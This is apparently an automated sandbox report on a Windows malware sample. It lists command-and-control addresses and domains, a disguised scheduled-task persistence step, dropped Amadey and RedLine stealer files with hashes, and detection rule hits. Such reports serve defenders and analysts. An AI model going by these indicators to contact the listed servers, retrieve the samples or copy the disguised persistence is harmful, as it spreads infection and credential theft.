                                                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    95.217.49.230
                                                                                                                                                                                    polyzi.comGermany
                                                                                                                                                                                    24940HETZNER-ASDEtrue
                                                                                                                                                                                    222.236.49.124
                                                                                                                                                                                    vatra.atKorea Republic of
                                                                                                                                                                                    9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                                                                                    IP
                                                                                                                                                                                    192.168.2.1
                                                                                                                                                                                    192.168.2.4
                                                                                                                                                                                    127.0.0.1
                                                                                                                                                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                                                    Analysis ID:778231
                                                                                                                                                                                    Start date and time:2023-01-05 08:56:08 +01:00
                                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 15m 50s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Sample file name:Ej3vSx3p8Y.exe
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                    Number of analysed new started processes analysed:52
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • HDC enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.rans.phis.troj.spyw.evad.winEXE@109/38@31/25
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 80%
                                                                                                                                                                                    HDC Information:Failed
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 90%
                                                                                                                                                                                    • Number of executed functions: 98
                                                                                                                                                                                    • Number of non-executed functions: 118
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Override analysis time to 240s for rundll32
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.82.210.154, 20.40.136.238, 142.250.184.35, 23.205.181.161, 23.205.188.153, 34.104.35.123, 142.250.184.106, 142.250.180.138, 142.250.180.170, 142.251.209.10, 142.251.209.42, 216.58.209.42, 142.250.184.42, 142.250.184.74, 20.189.173.11, 142.250.184.67, 52.168.112.67, 20.42.65.92, 20.189.173.22
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): aijscdn2.afd.azureedge.net, eudb.ris.api.iris.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, learn.microsoft.com, arc.msn.com, e11290.dspg.akamaiedge.net, go.microsoft.com, onedscolprdwus10.westus.cloudapp.azure.com, login.live.com, learn.microsoft.com.edgekey.net, update.googleapis.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, www.facebook.com, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, content-autofill.googleapis.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, ris.api.iris.microsoft.com, aijscdn2.azureedge.net, browser.events.data.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanage
                                                                                                                                                                                    • Execution Graph export aborted for target fgifwju, PID 3172 because there are no executed function
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    08:58:20Task SchedulerRun new task: Firefox Default Browser Agent AD797E3CACADDFED path: C:\Users\user\AppData\Roaming\fgifwju
                                                                                                                                                                                    08:58:28Task SchedulerRun new task: nbveek.exe path: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    08:58:28API Interceptor3318x Sleep call for process: nbveek.exe modified
                                                                                                                                                                                    08:59:09Task SchedulerRun new task: Firefox Default Browser Agent 4D2D2BBC78906CE2 path: C:\Users\user\AppData\Roaming\vhifwju
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    62.204.41.109VzPeXStJv5.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    I9sNE4Qudl.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109/Nmkn5d9Dn/index.php
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    potunulit.orgXcXzQ9XIby.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    XAkKSxd8GT.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                    7eJuUjjLeu.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    VzPeXStJv5.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                    LuJ6xSM17C.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                    1HlNRuQmVC.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    I9sNE4Qudl.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.9
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                    degroeneuitzender.nlfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    c3gsFCRXB9.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    XcXzQ9XIby.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    XAkKSxd8GT.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    7eJuUjjLeu.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 5.135.247.111
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    TNNET-ASTNNetOyMainnetworkFIfile.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.194
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.194
                                                                                                                                                                                    pvv6dLm4nj.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.91
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.194
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.194
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.194
                                                                                                                                                                                    XcXzQ9XIby.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    XAkKSxd8GT.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    2cb7882f519c747b5cd67d19559cdcc1c239a2ce34a12.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.194
                                                                                                                                                                                    bb5fbbb2168dcbaa2b6be6b302256208cca8d2358d683.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.194
                                                                                                                                                                                    7eJuUjjLeu.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    VzPeXStJv5.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.109
                                                                                                                                                                                    LuJ6xSM17C.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    I9sNE4Qudl.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 62.204.41.145
                                                                                                                                                                                    No context
                                                                                                                                                                                    No context
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\AAE1.exe
                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):425
                                                                                                                                                                                    Entropy (8bit):5.340009400190196
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                                                                                                    MD5:CC144808DBAF00E03294347EADC8E779
                                                                                                                                                                                    SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                                                                                                                                                    SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                                                                                                                                                    SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\CEE7.exe
                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):425
                                                                                                                                                                                    Entropy (8bit):5.340009400190196
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                                                                                                    MD5:CC144808DBAF00E03294347EADC8E779
                                                                                                                                                                                    SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                                                                                                                                                    SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                                                                                                                                                    SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):240640
                                                                                                                                                                                    Entropy (8bit):6.364466857316815
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:AbxUDsiH4X/Et6xXQ31UrhfSK6uVyWVYN+tGgUO:AbQOXUghSuVyWVG+7
                                                                                                                                                                                    MD5:BC45F9797F848DF442A883F994ADAD4A
                                                                                                                                                                                    SHA1:192CC4BC45C4F47147631D04A7FAFE418ACF7131
                                                                                                                                                                                    SHA-256:BEF6710DBE58CB2A400E94E471509B8BB3605EF74BA6C177F9744254AB2278E3
                                                                                                                                                                                    SHA-512:C4D4E2F53EAF779E889E86CC059C3B7A8518BB8C86E58DD0BD25D4B4683BCA59CE36AFD6E5B1CBF62E93437D08BEDA2C74AAE74ABF1AF623678B636C83461031
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Legno[1].exe, Author: Joe Security
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L...V.c.............................u............@.......................................@.................................8m..d...............................p(...?..p....................@......0@..@............................................text............................... ..`.rdata..............................@..@.data....D...........h..............@....rsrc...............................@..@.reloc..p(.......*..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):129024
                                                                                                                                                                                    Entropy (8bit):6.51230106176088
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Yx7pOYzBekV3tiINwyP7XSSJds3zhrjPcnqULv4O9:Yx7ZNhV3vwyOztPc3L
                                                                                                                                                                                    MD5:A98318B262AEE202DF529FD4DFE4C4BA
                                                                                                                                                                                    SHA1:536831B3A0F902BA4D003871C47A967777DE0959
                                                                                                                                                                                    SHA-256:12FB1C2A561508D6CB02B9213DE78383D15D5A85FCD70FE5455C988DE4DB0DF2
                                                                                                                                                                                    SHA-512:555F347D098FFCEFA2DDABEBC5F3CBB7D0956B2CA02E43FBE4F629BEBF03328F6187A6B7E4E09BFC82E87053D1631AE7D469DD4D95E167FABADBFA7ADC4397DE
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                    • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe
                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1074176
                                                                                                                                                                                    Entropy (8bit):6.479087791249224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:9WaH8CpPWxgnZDrZ+7xr17ZfVfTxN43y19:YFxgnZDrZSxBZfVfka
                                                                                                                                                                                    MD5:0017009AA184EBBD2D53A323114B0A34
                                                                                                                                                                                    SHA1:2049B480D74B0A9FE5F813E4DDB13328F930878D
                                                                                                                                                                                    SHA-256:AAFC78DFAC130DED368B8A0EB3648D371C2F2332804732E43C8431DDF01033CE
                                                                                                                                                                                    SHA-512:90434D597FD6D0CC65840A2607D4586D1CD855B42041AC80727B819CB3ADA58EE29C2FC9E79CE2A566FD940D4B21ACC9DCDC8BDC8B1A86F9BD3EAEC80681E244
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                    • Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cred64[1].dll, Author: kevoreilly
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............sO..sO..sO..wN..sO..pN..sO..vNe.sO..vN..sO..wN..sO..pN..sO..rN..sO..rOi.sON.zN..sON.sN..sON..O..sON.qN..sORich..sO................PE..d...Q.c.........." ................H.....................................................`.........................................p{..X....{..................................h.......p............................................................................text............................... ..`.rdata..............................@..@.data....o.......6...|..............@....pdata..............................@..@_RDATA...............J..............@..@.rsrc................L..............@..@.reloc..h............N..............@..B................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):129024
                                                                                                                                                                                    Entropy (8bit):6.512017496640721
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Yx7pOYzBeka3tiINwyP7XSSJds3zhrjPcnqULv4C9:Yx7ZNha3vwyOztPc3L
                                                                                                                                                                                    MD5:83D6D2070C5800BBAF7E61604273FFE2
                                                                                                                                                                                    SHA1:601568D5A02B30A302F6E3C4F9CD5EA53D9576A0
                                                                                                                                                                                    SHA-256:E59B1A06E20FFFA3C526B89920CC92A5E186BCC2C46A04EC540357E3D1869233
                                                                                                                                                                                    SHA-512:30A46A13706BA627F5F05FAF71BED26D5A63473AA7766C2FCF72F4CB5B2147E4645C678E509E28CE1C1A238F1D4AA5F67B80AD2675CB3CA91B88AFAC3D7204B3
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                    • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cred64[1].dll, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5
                                                                                                                                                                                    Entropy (8bit):1.5219280948873621
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:hn:h
                                                                                                                                                                                    MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                                                                                                                                                    SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                                                                                                                                                    SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                                                                                                                                                    SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    Preview:0....
                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):179200
                                                                                                                                                                                    Entropy (8bit):4.953249039785423
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:fxqZWVtaKUPLvL56dWKel5FDhBXxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOul:JqZb1SMDh
                                                                                                                                                                                    MD5:E2D0B894694E83BF28B18A634504F131
                                                                                                                                                                                    SHA1:C604AF3405093CA2E18FA33F18CFE9BA873216AC
                                                                                                                                                                                    SHA-256:3AA433E61713E35E7032EC0874523AFA5F32CA32CDAB880AFA338ED965C654C9
                                                                                                                                                                                    SHA-512:0067A2E8DE4248F3A237D09A692FF5FDC4AAB2DDE1D20328CE9F466E2E7E7BADA516915E8126C39E3D43C7224861E1DDEDB11200FF3DEABE5A5F6683DC58B61E
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe, Author: Joe Security
